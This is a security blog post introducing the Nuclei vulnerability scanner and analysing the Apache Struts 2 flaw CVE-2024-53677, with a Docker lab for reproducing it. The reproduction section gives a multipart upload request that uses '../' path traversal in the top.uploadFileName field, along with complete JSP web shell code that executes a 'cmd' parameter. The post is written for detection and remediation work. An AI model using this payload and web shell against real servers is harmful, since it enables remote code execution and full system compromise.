In this Safercy blog article, we aim to document both the open-source software Nuclei and the creation of specific “templates,” along with a practical case study of a vulnerability in Apache Struts 2 (a free framework for developing Java EE web applications): CVE-2024-53677.
This article is divided into two parts:
The first part (this article) covers an introduction to Nuclei and its template system, as well as a detailed analysis of CVE-2024-53677.
The second part will cover creating a template for discovering and confirming the aforementioned vulnerability.
Let’s begin by introducing the Nuclei vulnerability scanning solution.
What is Nuclei?
Nuclei is a fast, customizable vulnerability scanner widely used in the cybersecurity domain. It automates vulnerability detection using user-defined templates.
Thanks to its flexibility, Nuclei can scan various protocols such as HTTP, DNS, and TCP, detecting specific vulnerabilities or misconfigurations.
Nuclei is an open-source project available on GitHub and primarily developed in Golang.
Integration into SaferScan
At Safercy, we’ve integrated Nuclei into our managed scanning solution, Saferscan.
This integration allows us to provide clients with rapid and precise vulnerability detection while leveraging the community templates and creating custom templates tailored to specific needs.
How to Install Nuclei
Follow these steps to install Nuclei:
Prerequisites: Ensure Go is installed on your system.
Installation:
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Vérification : Confirm the installation:
nuclei -version
Mise à jour des templates : Download official templates:
nuclei -update-templates
For more details, visit the official Nuclei documentation.
Nuclei is also available as a SaaS at https://cloud.projectdiscovery.io/sign-up.
We recommend running it in a dedicated container or virtual machine to facilitate maintenance and preserve the environment’s state.
Nuclei Templates
What is a Nuclei Template?
A Nuclei template is a YAML file that defines a specific test for a vulnerability or configuration. It describes the requests to send, conditions to verify, and actions based on responses.
Why Create a Template?
Custom templates enable detection of vulnerabilities specific to your environment or newly discovered flaws not yet covered by official templates, enhancing security by targeting relevant risks.
Where Do Templates Go?
Templates can be shared with the community by submitting a pull request to the official Nuclei template repository.
One can simply create or edit a template via this website :
Case Study: Struts 2 Vulnerability (CVE-2024-53677)
Understanding the vulnerability
CVE-2024-53677 affects Apache Struts 2, enabling attackers to exploit file upload parameters for directory traversal, potentially leading to remote code execution.
Affected Versions
Struts 2.0.0 à 2.3.37 (end of life)
Struts 2.5.0 à 2.5.33
Struts 6.0.0 à 6.3.0.2
Impact
Arbitrary file uploads
Remote code execution
Full system compromise
Exploitability
Actively exploited in the wild, with public exploit code available.
Mitigation
Upgrade
Upgrade to Apache Struts 6.4.0 or later.
Mitigations
Disable unnecessary file upload functionalities.
Implement strict file type controls.
Monitor logs for suspicious activity.
Detailed Analysis of CVE-2024-53677
Before creating a Nuclei template to verify the existence of this vulnerability, which we will detail in the second part of this article, we will first analyze the vulnerability in depth to reproduce it.
To actively test the vulnerability, we can adapt the existing PoC into a Nuclei template.
Creating a Vulnerable Environment
To reproduce and test this vulnerability, a vulnerable environment must be set up. The simplest method is to use a Docker container configured to simulate a vulnerable Apache Struts application.
A GitHub repository has been identified: https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker. Although designed for CVE-2023-50164, this container is similar and can be adapted for CVE-2024-53677.
Using an Existing Docker Image
We identified a GitHub repository where the previous code has been updated in a format suitable for our tests: https://github.com/c4oocO/CVE-2024-53677-Docker.
Download and Run the Container
git clone <https://github.com/c4oocO/CVE-2024-53677-Docker>
cd CVE-2024-53677-Docker
docker build --ulimit nofile=122880:122880 -m 3G -t CVE-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name CVE-2024-53677 CVE-2024-53677
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name CVE-2024-53677 CVE-2024-53677
Environment Validation :
Verify you can access the upload application via :
Proof of Concept Analysis
The PoC for the CVE-2024-53677 vulnerability demonstrates exploitation through the manipulation of file upload parameters. The goal is to perform a directory traversal, enabling the attacker to write a malicious file to a specific location outside the directory initially intended for storing uploaded files.
Key Points of the PoC:
• Structured POST Request: The POST request used in the PoC includes well-defined headers and targeted parameters to exploit the file upload mechanism.
• Key Parameter Manipulation: The top.uploadFileName parameter is manipulated to attempt a directory traversal and overwrite an existing file.
• Test File Content: The uploaded file contains harmless content to test if the file is successfully written.
Steps to Exploit:
1. Scan the Target: Identify a valid endpoint for file upload (e.g., upload.action in the example).
2. Send a Test File: Use a POST request to send a test file and verify if the file is written and accessible.
Below is an excerpt from the PoC:
files = {
"upload": ("test.txt", harmless_content, "text/plain"),
"top.uploadFileName": test_filename # Tentative d'écrasement de fichier
}
The Python script then executes the request and checks if the file is accessible, thereby indicating the vulnerability.
Once the vulnerable environment is set up, execute the PoC to validate the vulnerability. Here are the key steps:
Execution Command:
Use the existing PoC script to send a test file to the configured endpoint.
Example:
$ python Check-CVE-2024-53677.py -u <http://localhost:8080/upload.action> --upload_endpoint /upload.action
Expected Result:
An HTTP 200 response indicating that the file was successfully uploaded.
A warning if the file is written to an unauthorized location, confirming the vulnerability.
Example of a log generated by the PoC:
$ python Check-CVE-2024-53677.py -u <http://cve-2024-53677.orb.local/upload.action> --upload_endpoint /upload.action
2024-12-30 16:04:07,865 [INFO] Starting detection process...
2024-12-30 16:04:07,865 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2024-12-30 16:04:07,865 [INFO] Sending test request to upload endpoint: <http://cve-2024-53677.orb.local/upload.action>
2024-12-30 16:04:07,902 [INFO] [INFO] File upload request succeeded.
2024-12-30 16:04:07,902 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2024-12-30 16:04:07,902 [INFO] Detection process completed.
Reproducing and Exploiting the Vulnerability
To reproduce the vulnerability and test its impact manually, follow these steps (in our examples, we used PortSwigger’s Burp Suite proxy):
Preparing the POST Request:
Configure a POST request with the required parameters and request body.
Example headers:
POST /upload.action HTTP/1.1
[..]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary982jlh8wv0ld4s2b
Content-Length: 338
------WebKitFormBoundary982jlh8wv0ld4s2b
Content-Disposition: form-data; name="Upload"; filename="shell.jsp"
Content-Type: text/plain
S2-067 detection test.
------WebKitFormBoundary982jlh8wv0ld4s2b
Content-Disposition: form-data; name="top.uploadFileName"
../../../../shell.jsp
Sent file content :
Create a malicious file with JSP code to enable command execution, replacing the placeholder S2-067 detection test. with the following content:
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
Process p;
try {
p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
InputStreamReader isr = new InputStreamReader(in);
BufferedReader br = new BufferedReader(isr);
String line;
while ((line = br.readLine()) != null) {
out.println(line + "<br>");
}
} catch (Exception e) {
out.println("Error: " + e.getMessage());
}
} else {
out.println("No command provided. Use '?cmd=<command>' to execute a command.");
}
%>
This results in the following request and response:
Validation of the Uploaded File:
Verify if the file has been written and is accessible via a public URL. Example test:
Exploitation Success :
The vulnerability is confirmed if you see the content of the folder being displayed (using the ls command on Linux systems).
By following these steps, you will gain a comprehensive understanding of the CVE-2024-53677 vulnerability and be equipped to create tailored tools for its detection and remediation, allowing to go to the next phase : building a Nuclei Template to detect CVE-2024-53677 .
Conclusion
The development of a Nuclei scanner component for CVE-2024-53677 highlights the importance of having customized and efficient detection tools. This approach enables organizations to quickly identify critical vulnerabilities and take necessary actions to secure their systems.
In the second part of this article, we will delve into the technical process of creating the Nuclei template, using this Struts 2 vulnerability as an example.
Comments